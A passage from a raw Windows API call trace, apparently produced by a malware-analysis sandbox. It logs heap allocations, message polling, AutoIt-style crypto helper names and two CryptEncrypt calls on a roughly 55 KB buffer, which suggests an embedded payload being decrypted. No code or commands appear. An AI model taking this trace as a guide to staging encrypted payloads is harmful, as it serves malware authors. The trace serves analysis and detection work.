dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0162.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0162.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0162.502] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0162.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0162.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0162.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0162.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0162.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0162.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0162.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0162.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0162.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0162.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0162.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0162.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0162.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0162.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0162.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0162.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0162.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0162.502] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0162.502] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0162.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0162.502] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0162.503] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0162.503] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.503] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.503] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0162.503] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0162.503] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0162.503] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.503] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.503] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.503] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.503] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.503] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0162.503] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0162.503] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0162.503] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.503] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0162.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0162.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0162.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0162.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0162.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0162.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0162.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0162.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0162.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0162.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.504] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.504] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0162.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0162.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0162.505] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0162.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0162.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0162.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0162.506] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xd79a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xd7a0) returned 1 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0162.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0162.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0162.506] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.506] CharLowerBuffW (in: lpsz="byte[55201]", cchLength=0xb | out: lpsz="byte[55201]") returned 0xb [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0162.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0162.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0162.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0162.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0162.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0162.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0162.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0162.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0162.507] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0162.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0162.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0162.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0162.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0162.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0162.509] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0162.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0162.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0162.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0162.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.509] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.509] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0162.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0162.509] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0162.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0162.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0162.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0162.510] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa48008*, pdwDataLen=0x87e820*=0xd79a, dwBufLen=0xd7a0 | out: pbData=0xa48008*, pdwDataLen=0x87e820*=0xd7a0) returned 1 [0162.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0162.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0162.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0162.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0162.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0162.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0162.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0162.510] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0162.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0162.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0162.510] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.510] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0162.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0162.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0162.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0162.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0162.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0162.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0162.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0162.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0162.512] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.512] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0162.512] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.512] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0162.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0162.513] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0162.513] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0162.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.513] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0162.513] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0162.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.513] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0162.513] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0162.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.513] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.513] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0162.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0162.513] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.513] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.513] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0162.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0162.513] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.518] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0162.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0162.518] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.518] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0162.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0162.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.560] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.560] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.561] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0162.561] PeekMessageW (in: 